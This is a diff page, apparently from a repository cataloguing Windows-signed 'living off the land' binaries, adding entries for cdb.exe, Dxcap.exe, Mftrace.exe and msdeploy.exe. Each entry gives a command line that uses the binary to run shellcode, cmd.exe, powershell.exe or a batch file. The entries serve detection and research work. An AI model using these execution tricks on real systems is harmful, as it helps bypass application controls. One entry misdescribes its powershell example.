19
OtherMSBinaries/Cdb.exe.md
Normal file
19
OtherMSBinaries/Cdb.exe.md
Normal file
@ -0,0 +1,19 @@
|
||||
## Cdb.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
cdb.exe -cf x64_calc.wds -o notepad.exe
|
||||
Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
|
||||
* https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
|
||||
* https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
||||
|
||||
* Notes: Thanks to Matt Graeber - @mattifestation
|
||||
|
17
OtherMSBinaries/Dxcap.exe.md
Normal file
17
OtherMSBinaries/Dxcap.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Dxcap.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Dxcap.exe -c C:\Windows\System32\notepad.exe
|
||||
Launch notepad as a subprocess of Dxcap.exe
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/harr0ey/status/992008180904419328
|
||||
|
||||
* Full path:
|
||||
* c:\Windows\System32\dxcap.exe
|
||||
* c:\Windows\SysWOW64\dxcap.exe
|
||||
|
||||
* Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
|
22
OtherMSBinaries/Mftrace.exe.md
Normal file
22
OtherMSBinaries/Mftrace.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Mftrace.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Mftrace.exe cmd.exe
|
||||
Launch cmd.exe as a subprocess of Mftrace.exe.
|
||||
|
||||
Mftrace.exe powershell.exe
|
||||
Launch cmd.exe as a subprocess of Mftrace.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
|
||||
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
|
||||
* C:\Program Files (x86)\Windows Kits\10\bin\x86
|
||||
* C:\Program Files (x86)\Windows Kits\10\bin\x64
|
||||
|
||||
* Notes: Thanks to fabrizio - @0rbz_
|
||||
|
16
OtherMSBinaries/Msdeploy.exe.md
Normal file
16
OtherMSBinaries/Msdeploy.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## Msdeploy.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
|
||||
Launch calc.bat via msdeploy.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/995837734379032576
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user